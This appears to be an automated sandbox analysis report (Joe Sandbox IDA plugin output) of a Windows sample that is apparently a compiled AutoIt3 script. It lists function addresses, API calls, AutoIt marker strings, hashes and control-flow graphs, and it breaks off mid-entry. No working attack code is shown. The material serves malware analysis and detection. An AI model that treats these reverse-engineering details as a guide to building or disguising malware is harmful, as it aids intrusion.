                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_memmove_wcslen
                                                                          • String ID: 0SH
                                                                          • API String ID: 3363477735-851180471
                                                                          • Opcode ID: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                                          • Instruction ID: 6dc39e8e7f592ebea2fdbb3e4710260bd4e3e134fe0a85e77c096ec086c2d55c
                                                                          • Opcode Fuzzy Hash: f8f98c37c4406a4215dc85d7f2641c0e713eb1a411c42a342b42510fc6581298
                                                                          • Instruction Fuzzy Hash: E361C170908656EECB10CFA9D84429DFBB0BF19308F54496ED404A3B42D379E969CB9A
                                                                          Function 0040EBD0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EBB5,0040D72E), ref: 0040EBDB
                                                                          • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EBED
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: AddressLibraryLoadProc
                                                                          • String ID: IsThemeActive$uxtheme.dll
                                                                          • API String ID: 2574300362-3542929980
                                                                          • Opcode ID: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                                          • Instruction ID: d0aec1e7cdd3fc231052cfb2f432bc7d0e698e699ac1f50efe2d89ca8b78c0bc
                                                                          • Opcode Fuzzy Hash: d24d5e89e243abfb53b7c80675e6652b9f125c078b3c3d01997506936a79e34d
                                                                          • Instruction Fuzzy Hash: D6D0C7B49407039AD7305F71C91871B76E47B50751F104C3DF946A1294DB7CD040D768
                                                                          Function 004091E0 Relevance: 44.6, APIs: 22, Strings: 3, Instructions: 837windowsleepCOMMON
                                                                          Download Yara Rule
                                                                          APIs
                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409266
                                                                          • Sleep.KERNEL32(0000000A,?), ref: 004094D1
                                                                          • TranslateMessage.USER32(?), ref: 00409556
                                                                          • DispatchMessageW.USER32(?), ref: 00409561
                                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00409574
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Message$Peek$DispatchSleepTranslate
                                                                          • String ID: @GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE
                                                                          • API String ID: 1762048999-758534266
                                                                          • Opcode ID: 65ef02fb38a27282c9e7cf101ebea7aa72ed4640524a943440740a68ee139f81
                                                                          • Instruction ID: 6221a9036d09df45d33125ba93b856da71e554157a22c4cdc10a0b2ba1356448
                                                                          • Opcode Fuzzy Hash: 65ef02fb38a27282c9e7cf101ebea7aa72ed4640524a943440740a68ee139f81
                                                                          • Instruction Fuzzy Hash: EF62E370608341AFD724DF25C884BABF7A4BF85304F14492FF94597292D778AC89CB9A
                                                                          Function 00401F20 Relevance: 24.7, APIs: 8, Strings: 6, Instructions: 214COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104,?), ref: 00401F4C
                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                          • __wcsicoll.LIBCMT ref: 00402007
                                                                          • __wcsicoll.LIBCMT ref: 0040201D
                                                                          • __wcsicoll.LIBCMT ref: 00402033
                                                                            • Part of subcall function 004114AB: __wcsicmp_l.LIBCMT ref: 0041152B
                                                                          • __wcsicoll.LIBCMT ref: 00402049
                                                                          • _wcscpy.LIBCMT ref: 0040207C
                                                                          • GetModuleFileNameW.KERNEL32(00000000,004A7F6C,00000104), ref: 00428B5B
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: __wcsicoll$FileModuleName$__wcsicmp_l_memmove_wcscpy_wcslen
                                                                          • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$CMDLINE$CMDLINERAW
                                                                          • API String ID: 3948761352-1609664196
                                                                          • Opcode ID: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                                                                          • Instruction ID: a67d1fff980de619c7b08a01c822048bbc87f212fdb5160913ca6de555091b2a
                                                                          • Opcode Fuzzy Hash: 27c0ee8d5e07ffa73b3ecf85f0a0f7e742300051f6853106ad547b3ced8c3f3f
                                                                          • Instruction Fuzzy Hash: 0E718571D0021A9ACB10EBA1DD456EE7774AF54308F40843FF905772D1EBBC6A49CB99
                                                                          Function 0040E360 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 151COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 0040E3FF
                                                                          • __wsplitpath.LIBCMT ref: 0040E41C
                                                                            • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                          • _wcsncat.LIBCMT ref: 0040E433
                                                                          • __wmakepath.LIBCMT ref: 0040E44F
                                                                            • Part of subcall function 00413A9E: __wmakepath_s.LIBCMT ref: 00413AB4
                                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                            • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                            • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                          • _wcscpy.LIBCMT ref: 0040E487
                                                                            • Part of subcall function 0040E4C0: RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                                                                          • _wcscat.LIBCMT ref: 00427541
                                                                          • _wcslen.LIBCMT ref: 00427551
                                                                          • _wcslen.LIBCMT ref: 00427562
                                                                          • _wcscat.LIBCMT ref: 0042757C
                                                                          • _wcsncpy.LIBCMT ref: 004275BC
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: _wcscat_wcslenstd::exception::exception$Exception@8FileModuleNameOpenThrow__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpy
                                                                          • String ID: Include$\
                                                                          • API String ID: 3173733714-3429789819
                                                                          • Opcode ID: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                                                          • Instruction ID: e70d120923bcd55e0c09bdb97153e7c20ea4c8242d515b2096525f9594b4aeca
                                                                          • Opcode Fuzzy Hash: 319b33b76db705e9c7f26a1fcfbfbea2712403a0e0e393e117160b8853bc2a6c
                                                                          • Instruction Fuzzy Hash: 9851DAB1504301ABE314EF66DC8589BBBE4FB8D304F40493EF589972A1E7749944CB5E
                                                                          Function 004528BD Relevance: 19.7, APIs: 13, Instructions: 173COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • _fseek.LIBCMT ref: 0045292B
                                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045273E
                                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452780
                                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 0045279E
                                                                            • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 004527D2
                                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 004527E2
                                                                            • Part of subcall function 00452719: __fread_nolock.LIBCMT ref: 00452800
                                                                            • Part of subcall function 00452719: _wcscpy.LIBCMT ref: 00452831
                                                                          • __fread_nolock.LIBCMT ref: 00452961
                                                                          • __fread_nolock.LIBCMT ref: 00452971
                                                                          • __fread_nolock.LIBCMT ref: 0045298A
                                                                          • __fread_nolock.LIBCMT ref: 004529A5
                                                                          • _fseek.LIBCMT ref: 004529BF
                                                                          • _malloc.LIBCMT ref: 004529CA
                                                                          • _malloc.LIBCMT ref: 004529D6
                                                                          • __fread_nolock.LIBCMT ref: 004529E7
                                                                          • _free.LIBCMT ref: 00452A17
                                                                          • _free.LIBCMT ref: 00452A20
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: __fread_nolock$_free_fseek_malloc_wcscpy
                                                                          • String ID:
                                                                          • API String ID: 1255752989-0
                                                                          • Opcode ID: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                                          • Instruction ID: f7ea06a446360153d9086f7ce944ba4ee1a7a4a6ab52c1fb03413739877f8e55
                                                                          • Opcode Fuzzy Hash: dcee285f3eb4ed07ece3e5bb349529478d219aecda09341451d4e57d6f047cda
                                                                          • Instruction Fuzzy Hash: B95111F1900218AFDB60DF65DC81B9A77B9EF88304F0085AEF50CD7241E675AA84CF59
                                                                          Function 00452719 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 147COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: __fread_nolock$_fseek_wcscpy
                                                                          • String ID: FILE
                                                                          • API String ID: 3888824918-3121273764
                                                                          • Opcode ID: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                                          • Instruction ID: d9efd4ed024b2b159ad8c10c4a9bf0fd337e36d0f3dc2ca46923192c63d65648
                                                                          • Opcode Fuzzy Hash: b4a6abdb64f38c8defcee882be961308622b799a5cba7293a02d79de09a932e7
                                                                          • Instruction Fuzzy Hash: DC4196B2910204BBEB20EBD5DC81FEF7379AF88704F14455EFA0497281F6799684CBA5
                                                                          Function 00410490 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 56windowregistryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                          • RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                          • InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                          • LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                          • ImageList_ReplaceIcon.COMCTL32(00A8EFD8,000000FF,00000000), ref: 00410552
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                          • API String ID: 2914291525-1005189915
                                                                          • Opcode ID: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                          • Instruction ID: 324008788ca11066222c16167fc5b3db855b21205033cf9bff29629ff6c43806
                                                                          • Opcode Fuzzy Hash: d6ae890ac616c70b0adde597a8f502ff5fb08519606e77913bb64844803ac3e9
                                                                          • Instruction Fuzzy Hash: 6221F7B1900218AFDB40DFA4E988B9DBFB4FB09710F10862EFA15A6390D7B40544CF99
                                                                          Function 00410390 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 76windowregistryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetSysColorBrush.USER32(0000000F), ref: 0041039B
                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 004103AA
                                                                          • LoadIconW.USER32(?,00000063), ref: 004103C0
                                                                          • LoadIconW.USER32(?,000000A4), ref: 004103D3
                                                                          • LoadIconW.USER32(?,000000A2), ref: 004103E6
                                                                          • LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041040E
                                                                          • RegisterClassExW.USER32(?), ref: 0041045D
                                                                            • Part of subcall function 00410490: GetSysColorBrush.USER32(0000000F), ref: 004104C3
                                                                            • Part of subcall function 00410490: RegisterClassExW.USER32(00000030), ref: 004104ED
                                                                            • Part of subcall function 00410490: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 004104FE
                                                                            • Part of subcall function 00410490: InitCommonControlsEx.COMCTL32(004A90E8), ref: 0041051B
                                                                            • Part of subcall function 00410490: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 0041052B
                                                                            • Part of subcall function 00410490: LoadIconW.USER32(00400000,000000A9), ref: 00410542
                                                                            • Part of subcall function 00410490: ImageList_ReplaceIcon.COMCTL32(00A8EFD8,000000FF,00000000), ref: 00410552
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                          • String ID: #$0$AutoIt v3
                                                                          • API String ID: 423443420-4155596026
                                                                          • Opcode ID: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                          • Instruction ID: fa3beea58d24b169a793a749875a715f65b9999dd8e8f54869ce90ead7ff89b0
                                                                          • Opcode Fuzzy Hash: c82d51e411665b6a3a3e76d1a8d87b49acf25a0f72c8993ed2556b78267af7e8
                                                                          • Instruction Fuzzy Hash: 31212AB1E55214AFD720DFA9ED45B9EBBB8BB4C700F00447AFA08A7290D7B559408B98
                                                                          Function 0040A780 Relevance: 16.6, APIs: 8, Strings: 1, Instructions: 881COMMON
                                                                          Download Yara Rule
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: _malloc
                                                                          • String ID: Default
                                                                          • API String ID: 1579825452-753088835
                                                                          • Opcode ID: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                                                                          • Instruction ID: a673259d86369fb9501a746496732cc59a2062e12c9a0651055f0cdb6904a52b
                                                                          • Opcode Fuzzy Hash: 4baf5ca2405be5455ac24bb95f1fa40f153dd1d14dcfbbf3cadbb4c6cd5c85f8
                                                                          • Instruction Fuzzy Hash: 13729DB06043019FD714DF25D481A2BB7E5EF85314F14882EE986AB391D738EC56CB9B
                                                                          Function 0040F5C0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 125COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1054 40f5c0-40f5cf call 422240 1057 40f5d0-40f5e8 1054->1057 1057->1057 1058 40f5ea-40f613 call 413650 call 410e60 1057->1058 1063 40f614-40f633 call 414d04 1058->1063 1066 40f691 1063->1066 1067 40f635-40f63c 1063->1067 1068 40f696-40f69c 1066->1068 1069 40f660-40f674 call 4150d1 1067->1069 1070 40f63e 1067->1070 1074 40f679-40f67c 1069->1074 1071 40f640 1070->1071 1073 40f642-40f650 1071->1073 1075 40f652-40f655 1073->1075 1076 40f67e-40f68c 1073->1076 1074->1063 1077 40f65b-40f65e 1075->1077 1078 425d1e-425d3e call 4150d1 call 414d04 1075->1078 1079 40f68e-40f68f 1076->1079 1080 40f69f-40f6ad 1076->1080 1077->1069 1077->1071 1091 425d43-425d5f call 414d30 1078->1091 1079->1075 1082 40f6b4-40f6c2 1080->1082 1083 40f6af-40f6b2 1080->1083 1085 425d16 1082->1085 1086 40f6c8-40f6d6 1082->1086 1083->1075 1085->1078 1088 425d05-425d0b 1086->1088 1089 40f6dc-40f6df 1086->1089 1088->1073 1090 425d11 1088->1090 1089->1075 1090->1085 1091->1068
                                                                          APIs
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793801782.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_fJD7ivEnzm.jbxd
                                                                          Similarity
                                                                          • API ID: __fread_nolock_fseek_memmove_strcat
                                                                          • String ID: AU3!$EA06
                                                                          • API String ID: 1268643489-2658333250
                                                                          • Opcode ID: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                                          • Instruction ID: 581a58983a44a30c9dde9fea67fd4d6d070b0eb534c71953d0d39c84ae2506d9
                                                                          • Opcode Fuzzy Hash: 344840b9fdfdbe4b30e8dbd48a4dc96b4183e4050995daab1dbb295d1862c352
                                                                          • Instruction Fuzzy Hash: A541EF3160414CABCB21DF64D891FFD3B749B15304F2808BFF581A7692EA79A58AC754
                                                                          Function 00401100 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136windowtimeregistryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 1094 401100-401111 1095 401113-401119 1094->1095 1096 401179-401180 1094->1096 1098 401144-40114a 1095->1098 1099 40111b-40111e 1095->1099 1096->1095 1097 401182 1096->1097 1100 40112c-401141 DefWindowProcW 1097->1100 1102 401184-40118e call 401250 1098->1102 1103 40114c-40114f 1098->1103 1099->1098 1101 401120-401126 1099->1101 1101->1100 1105 42b038-42b03f 1101->1105 1109 401193-40119a 1102->1109 1106 401151-401157 1103->1106 1107 40119d 1103->1107 1105->1100 1108 42b045-42b059 call 401000 call 40e0c0 1105->1108 1112 401219-40121f 1106->1112 1113 40115d 1106->1113 1110 4011a3-4011a9 1107->1110 1111 42afb4-42afc5 call 40f190 1107->1111 1108->1100 1110->1101 1116 4011af 1110->1116 1111->1109 1112->1101 1119 401225-42b06d call 468b0e 1112->1119 1117 401163-401166 1113->1117 1118 42b01d-42b024 1113->1118 1116->1101 1122 4011b6-4011d8 KillTimer call 401000 PostQuitMessage 1116->1122 1123 4011db-401202 SetTimer RegisterWindowMessageW 1116->1123 1125 42afe9-42b018 call 40f190 call 401a50 1117->1125 1126 40116c-401172 1117->1126 1118->1100 1124 42b02a-42b033 call 4370f4 1118->1124 1119->1109 1123->1109 1132 401204-401216 CreatePopupMenu 1123->1132 1124->1100 1125->1100 1126->1101 1134 401174-42afde call 45fd57 1126->1134 1134->1100 1145 42afe4 1134->1145 1145->1109
                                                                          APIs
                                                                          • DefWindowProcW.USER32(?,?,?,?,?,?,?,004010F8,?,?,?), ref: 00401136
                                                                          • KillTimer.USER32(?,00000001,?), ref: 004011B9
                                                                          • PostQuitMessage.USER32(00000000), ref: 004011CB
                                                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 004011E5
                                                                          • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,004010F8,?,?,?), ref: 004011F0
                                                                          • CreatePopupMenu.USER32 ref: 00401204
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1793600537.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.1793581334.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793656773.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793695888.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793725834.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                          • Associated: 00000000.00000002.1793757849.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
